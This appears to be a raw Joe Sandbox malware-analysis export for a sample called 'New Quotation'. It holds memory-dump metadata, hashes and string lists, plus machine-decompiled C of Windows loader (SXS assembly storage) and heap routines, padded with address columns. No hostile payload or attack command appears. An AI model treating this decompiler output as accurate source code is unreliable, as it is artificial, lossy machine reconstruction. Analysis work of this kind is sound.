                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d833223
                                                                                                                                                                                          0x1d833226
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83322c
                                                                                                                                                                                          0x1d7db193
                                                                                                                                                                                          0x1d7db193
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7db193
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dae9a
                                                                                                                                                                                          0x1d7dae83
                                                                                                                                                                                          0x1d7dae60
                                                                                                                                                                                          0x1d7dae4b
                                                                                                                                                                                          0x1d7dae4b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dae4b
                                                                                                                                                                                          0x1d7dae2d

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                                                                                          • API String ID: 0-4098886588
                                                                                                                                                                                          • Opcode ID: d45b17d20e20bfd5cf1496d7d75557d73c2e9d043bd588e03ec9c5d339187fa2
                                                                                                                                                                                          • Instruction ID: d782d26a259c25a428043cb73fd5a6d7b72a18738bc219482fe3fa6243c07bcc
                                                                                                                                                                                          • Opcode Fuzzy Hash: d45b17d20e20bfd5cf1496d7d75557d73c2e9d043bd588e03ec9c5d339187fa2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6032BB719047A99BDB62CF14C884BEEB7B9BF44760F1481EAE84CA7250D7359E81CF42
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D802C10 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                          			E1D802C10(intOrPtr _a4, intOrPtr* _a8, signed int* _a12) {
				signed int _v8;
				char _v540;
				signed int _v544;
				char _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				signed int _v576;
				char _v580;
				char _v584;
				char* _v588;
				signed int _v590;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				intOrPtr _v604;
				signed int _v608;
				signed int _v612;
				signed short _v616;
				intOrPtr _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				intOrPtr _t79;
				signed int _t82;
				intOrPtr _t84;
				intOrPtr* _t104;
				void* _t105;
				void* _t106;
				signed int _t109;
				void* _t112;
				intOrPtr _t113;
				void* _t119;
				signed int _t123;
				signed int* _t126;
				void* _t127;
				signed int _t131;
				signed int _t133;

				_t133 = (_t131 & 0xfffffff8) - 0x25c;
				_v8 =  *0x1d8cb370 ^ _t133;
				_t104 = _a8;
				_t126 = _a12;
				_t76 = _a4 - 1;
				if(_t76 == 0) {
					_v580 = 0x18;
					_push( &_v580);
					_v568 = 0x40;
					_push(8);
					_v600 = 0;
					_push( &_v600);
					_v576 = 0;
					_v572 = 0x1d7a1338;
					_v564 = 0;
					_v560 = 0;
					_t79 = E1D812AB0();
					_v620 = _t79;
					if(_t79 >= 0 || _t79 == 0xc0000034 || _t79 == 0xc0000189) {
						_t80 = _v600;
						 *(_t104 + 0x18) =  *(_t104 + 0x18) | 0xffffffff;
						 *((intOrPtr*)(_t104 + 8)) = _v600;
					} else {
						_push(_t79);
						_t80 = E1D85EF10(0x33, 0, "SXS: Unable to open registry key %wZ Status = 0x%08lx\n", 0x1d7a1338);
						 *((char*)(_t104 + 0x1c)) = 1;
						L36:
						_t133 = _t133 + 0x14;
						if(_t126 == 0) {
							L9:
							_pop(_t119);
							_pop(_t127);
							_pop(_t105);
							return E1D814B50(_t80, _t105, _v8 ^ _t133, _t115, _t119, _t127);
						}
						_t80 = _v608;
						L38:
						 *_t126 = _t80;
					}
					goto L9;
				}
				_t82 = _t76 - 1;
				if(_t82 != 0) {
					_t80 = _t82;
					if(_t80 == 0 &&  *_t104 != _t80) {
						_push( *_t104);
						_t80 = E1D812A80();
					}
					goto L9;
				}
				_t84 =  *((intOrPtr*)(_t104 + 4));
				if(_t84 != 0) {
					if(_t84 != 1) {
						_t109 =  *_t104;
						_t80 = _t84 + 0xfffffffe;
						_v608 = _t109;
						_v584 = 0;
						_v596 = _t80;
						if(_t109 == 0) {
							L33:
							 *((char*)(_t104 + 9)) = 1;
							goto L9;
						}
						_push( &_v584);
						_push(0x220);
						_t115 =  &_v556;
						_push( &_v556);
						_push(0);
						_push(_t80);
						_push(_t109);
						_t80 = E1D812CD0();
						_v624 = _t80;
						if(_t80 >= 0) {
							_t80 = _v544;
							if(_t80 > 0xfffe) {
								L20:
								 *((char*)(_t104 + 8)) = 1;
								if(_t126 != 0) {
									 *_t126 = 0xc0000106;
								}
								goto L9;
							}
							_t115 =  &_v592;
							_v592 = _t80;
							_v590 = _t80;
							_v588 =  &_v540;
							_t80 = E1D85E222(_v608,  &_v592, _t104 + 0xc);
							_v612 = _t80;
							if(_t80 >= 0) {
								goto L9;
							}
							_push(_t80);
							_t80 = E1D85EF10(0x33, 0, "SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx\n",  &_v592);
							 *((char*)(_t104 + 8)) = 1;
							goto L36;
						}
						if(_t80 == 0x8000001a) {
							goto L33;
						}
						_push(_t80);
						_t80 = E1D85EF10(0x33, 0, "SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx\n", _v596);
						_t133 = _t133 + 0x14;
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 == 0) {
							goto L9;
						}
						_t80 = _v600;
						goto L38;
					}
					E1D815050(_t106,  &_v608, E1D7E01C0());
					_t115 = _v616 & 0x0000ffff;
					 *(_t104 + 0xc) = 0;
					_t27 = _t115 + 0x10; // 0x50
					_t80 = _t27;
					if(_t27 > ( *(_t104 + 0xe) & 0x0000ffff)) {
						L22:
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 != 0) {
							 *_t126 = 0xc0000023;
						}
						goto L9;
					}
					E1D8188C0( *((intOrPtr*)(_t104 + 0x10)), _v604, _t115);
					_t133 = _t133 + 0xc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t80 = _v608 + 0x10;
					L8:
					 *(_t104 + 0xc) = _t80;
					goto L9;
				}
				_t80 =  *( *[fs:0x30] + 0x10);
				_t123 =  *( *( *[fs:0x30] + 0x10) + 0x38) & 0x0000ffff;
				_v596 = _t123;
				_t112 = _t123 + 0x10;
				if(_t112 > 0xfffe) {
					goto L20;
				}
				_t80 =  *(_t104 + 0xe) & 0x0000ffff;
				if(_t112 > ( *(_t104 + 0xe) & 0x0000ffff)) {
					goto L22;
				}
				_t113 =  *((intOrPtr*)( *( *[fs:0x30] + 0x10) + 0x3c));
				if(( *( *( *[fs:0x30] + 0x10) + 8) & 0x00000001) == 0) {
					_t113 = _t113 +  *( *[fs:0x30] + 0x10);
				}
				E1D8188C0( *((intOrPtr*)(_t104 + 0x10)), _t113, _t123);
				_t133 = _t133 + 0xc;
				_t115 = 1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t104 + 0xc) = _v596 + 0xe;
				if(E1D803194( *((intOrPtr*)(_t104 + 0x10)), 1) != 0) {
					goto L9;
				} else {
					_t80 = 0;
					goto L8;
				}
			}












































                                                                                                                                                                                          0x1d802c18
                                                                                                                                                                                          0x1d802c25
                                                                                                                                                                                          0x1d802c30
                                                                                                                                                                                          0x1d802c34
                                                                                                                                                                                          0x1d802c38
                                                                                                                                                                                          0x1d802c3b
                                                                                                                                                                                          0x1d802d62
                                                                                                                                                                                          0x1d802d6a
                                                                                                                                                                                          0x1d802d6d
                                                                                                                                                                                          0x1d802d75
                                                                                                                                                                                          0x1d802d7b
                                                                                                                                                                                          0x1d802d7f
                                                                                                                                                                                          0x1d802d80
                                                                                                                                                                                          0x1d802d84
                                                                                                                                                                                          0x1d802d8c
                                                                                                                                                                                          0x1d802d90
                                                                                                                                                                                          0x1d802d94
                                                                                                                                                                                          0x1d802d99
                                                                                                                                                                                          0x1d802d9f
                                                                                                                                                                                          0x1d802dac
                                                                                                                                                                                          0x1d802db0
                                                                                                                                                                                          0x1d802db4
                                                                                                                                                                                          0x1d8425a0
                                                                                                                                                                                          0x1d8425a0
                                                                                                                                                                                          0x1d8425ae
                                                                                                                                                                                          0x1d8425b3
                                                                                                                                                                                          0x1d8425b7
                                                                                                                                                                                          0x1d8425b7
                                                                                                                                                                                          0x1d8425bc
                                                                                                                                                                                          0x1d802cd8
                                                                                                                                                                                          0x1d802cdf
                                                                                                                                                                                          0x1d802ce0
                                                                                                                                                                                          0x1d802ce1
                                                                                                                                                                                          0x1d802cec
                                                                                                                                                                                          0x1d802cec
                                                                                                                                                                                          0x1d8425c2
                                                                                                                                                                                          0x1d8425c6
                                                                                                                                                                                          0x1d8425c6
                                                                                                                                                                                          0x1d8425c6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802d9f
                                                                                                                                                                                          0x1d802c41
                                                                                                                                                                                          0x1d802c44
                                                                                                                                                                                          0x1d802cf0
                                                                                                                                                                                          0x1d802cf3
                                                                                                                                                                                          0x1d84247e
                                                                                                                                                                                          0x1d842480
                                                                                                                                                                                          0x1d842480
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802cf3
                                                                                                                                                                                          0x1d802c4a
                                                                                                                                                                                          0x1d802c4f
                                                                                                                                                                                          0x1d802d01
                                                                                                                                                                                          0x1d8424c6
                                                                                                                                                                                          0x1d8424ca
                                                                                                                                                                                          0x1d8424cd
                                                                                                                                                                                          0x1d8424d1
                                                                                                                                                                                          0x1d8424d5
                                                                                                                                                                                          0x1d8424db
                                                                                                                                                                                          0x1d84258c
                                                                                                                                                                                          0x1d84258c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84258c
                                                                                                                                                                                          0x1d8424e5
                                                                                                                                                                                          0x1d8424e6
                                                                                                                                                                                          0x1d8424eb
                                                                                                                                                                                          0x1d8424ef
                                                                                                                                                                                          0x1d8424f0
                                                                                                                                                                                          0x1d8424f1
                                                                                                                                                                                          0x1d8424f2
                                                                                                                                                                                          0x1d8424f3
                                                                                                                                                                                          0x1d8424f8
                                                                                                                                                                                          0x1d8424fe
                                                                                                                                                                                          0x1d842535
                                                                                                                                                                                          0x1d84253e
                                                                                                                                                                                          0x1d84248a
                                                                                                                                                                                          0x1d84248a
                                                                                                                                                                                          0x1d842490
                                                                                                                                                                                          0x1d842496
                                                                                                                                                                                          0x1d842496
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842490
                                                                                                                                                                                          0x1d842548
                                                                                                                                                                                          0x1d84254c
                                                                                                                                                                                          0x1d842551
                                                                                                                                                                                          0x1d84255a
                                                                                                                                                                                          0x1d842562
                                                                                                                                                                                          0x1d842567
                                                                                                                                                                                          0x1d84256d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842573
                                                                                                                                                                                          0x1d842581
                                                                                                                                                                                          0x1d842586
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d842586
                                                                                                                                                                                          0x1d842505
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84250b
                                                                                                                                                                                          0x1d842518
                                                                                                                                                                                          0x1d84251d
                                                                                                                                                                                          0x1d842520
                                                                                                                                                                                          0x1d842526
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84252c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84252c
                                                                                                                                                                                          0x1d802d12
                                                                                                                                                                                          0x1d802d17
                                                                                                                                                                                          0x1d802d22
                                                                                                                                                                                          0x1d802d26
                                                                                                                                                                                          0x1d802d26
                                                                                                                                                                                          0x1d802d2b
                                                                                                                                                                                          0x1d8424a1
                                                                                                                                                                                          0x1d8424a1
                                                                                                                                                                                          0x1d8424a7
                                                                                                                                                                                          0x1d8424ad
                                                                                                                                                                                          0x1d8424ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8424a7
                                                                                                                                                                                          0x1d802d39
                                                                                                                                                                                          0x1d802d4b
                                                                                                                                                                                          0x1d802d4e
                                                                                                                                                                                          0x1d802d4f
                                                                                                                                                                                          0x1d802d50
                                                                                                                                                                                          0x1d802d51
                                                                                                                                                                                          0x1d802d56
                                                                                                                                                                                          0x1d802cd4
                                                                                                                                                                                          0x1d802cd4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802cd4
                                                                                                                                                                                          0x1d802c5b
                                                                                                                                                                                          0x1d802c5e
                                                                                                                                                                                          0x1d802c62
                                                                                                                                                                                          0x1d802c66
                                                                                                                                                                                          0x1d802c6f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802c75
                                                                                                                                                                                          0x1d802c7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802c8a
                                                                                                                                                                                          0x1d802c9a
                                                                                                                                                                                          0x1d8424be
                                                                                                                                                                                          0x1d8424be
                                                                                                                                                                                          0x1d802ca6
                                                                                                                                                                                          0x1d802cb6
                                                                                                                                                                                          0x1d802cbc
                                                                                                                                                                                          0x1d802cbe
                                                                                                                                                                                          0x1d802cbf
                                                                                                                                                                                          0x1d802cc0
                                                                                                                                                                                          0x1d802cc1
                                                                                                                                                                                          0x1d802cc5
                                                                                                                                                                                          0x1d802cd0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802cd2
                                                                                                                                                                                          0x1d802cd2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d802cd2

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 1D842579
                                                                                                                                                                                          • @, xrefs: 1D802D6D
                                                                                                                                                                                          • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 1D8425A6
                                                                                                                                                                                          • \WinSxS\, xrefs: 1D802D43
                                                                                                                                                                                          • .Local\, xrefs: 1D802CB1
                                                                                                                                                                                          • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 1D842510
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                                                                                                          • API String ID: 0-3926108909
                                                                                                                                                                                          • Opcode ID: affd911f2ce132659b0de255f2d826bba83f764aa000c4ade608ad9e8180259b
                                                                                                                                                                                          • Instruction ID: c096b962ca7def8ee4c6f50036be1e09c3395cbf4d9a08688d7d859a73a787a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: affd911f2ce132659b0de255f2d826bba83f764aa000c4ade608ad9e8180259b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91819871508345AFD722CF18C8C0B6BB7E8BF85714F118A9AF9949B251D3B0E944CBA3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E1D7E0680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E1D7E0ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x1d8c6960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E1D7CB910();
						__eflags =  *0x1d8c5da8;
						if(__eflags == 0) {
							E1D88FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x1d8c6d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x1d8c91e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E1D812BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E1D895FED(0, _t300, 1, _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x1d8c373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E1D812B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E1D88EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E1D88D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E1D895FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E1D7E096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E1D895FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E1D7E3C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E1D88F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E1D7E3C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E1D88F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E1D7E036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E1D895FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E1D895FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x1d8c432c; // 0x0
						_v24 = 0x1d8c432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}
























































                                                                                                                                                                                          0x1d7e0689
                                                                                                                                                                                          0x1d7e068d
                                                                                                                                                                                          0x1d7e0690
                                                                                                                                                                                          0x1d7e0699
                                                                                                                                                                                          0x1d7e06a3
                                                                                                                                                                                          0x1d7e0929
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e0929
                                                                                                                                                                                          0x1d7e06b0
                                                                                                                                                                                          0x1d834e97
                                                                                                                                                                                          0x1d834e99
                                                                                                                                                                                          0x1d834e9f
                                                                                                                                                                                          0x1d834ea5
                                                                                                                                                                                          0x1d834ea9
                                                                                                                                                                                          0x1d834eca
                                                                                                                                                                                          0x1d834ecf
                                                                                                                                                                                          0x1d834eab
                                                                                                                                                                                          0x1d834ec0
                                                                                                                                                                                          0x1d834ec5
                                                                                                                                                                                          0x1d834ed7
                                                                                                                                                                                          0x1d834edc
                                                                                                                                                                                          0x1d834ee4
                                                                                                                                                                                          0x1d834eeb
                                                                                                                                                                                          0x1d834ef6
                                                                                                                                                                                          0x1d834ef6
                                                                                                                                                                                          0x1d834eeb
                                                                                                                                                                                          0x1d834e99
                                                                                                                                                                                          0x1d7e06b6
                                                                                                                                                                                          0x1d7e06b9
                                                                                                                                                                                          0x1d7e06b9
                                                                                                                                                                                          0x1d7e06be
                                                                                                                                                                                          0x1d7e0921
                                                                                                                                                                                          0x1d7e06c4
                                                                                                                                                                                          0x1d7e06c4
                                                                                                                                                                                          0x1d7e06c4
                                                                                                                                                                                          0x1d7e06ca
                                                                                                                                                                                          0x1d7e06d3
                                                                                                                                                                                          0x1d7e06d9
                                                                                                                                                                                          0x1d7e06dc
                                                                                                                                                                                          0x1d834f0a
                                                                                                                                                                                          0x1d834f10
                                                                                                                                                                                          0x1d834f13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e06e2
                                                                                                                                                                                          0x1d7e06e2
                                                                                                                                                                                          0x1d7e06f2
